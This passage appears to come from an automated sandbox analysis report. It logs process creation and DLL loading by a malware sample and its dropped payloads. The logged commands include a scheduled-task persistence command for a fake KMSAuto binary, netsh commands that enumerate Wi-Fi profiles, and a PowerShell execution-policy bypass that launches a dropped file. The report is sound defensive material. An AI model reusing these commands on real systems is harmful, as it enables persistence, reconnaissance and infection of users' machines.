Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 7
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\relog.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Section loaded: gpapi.dll
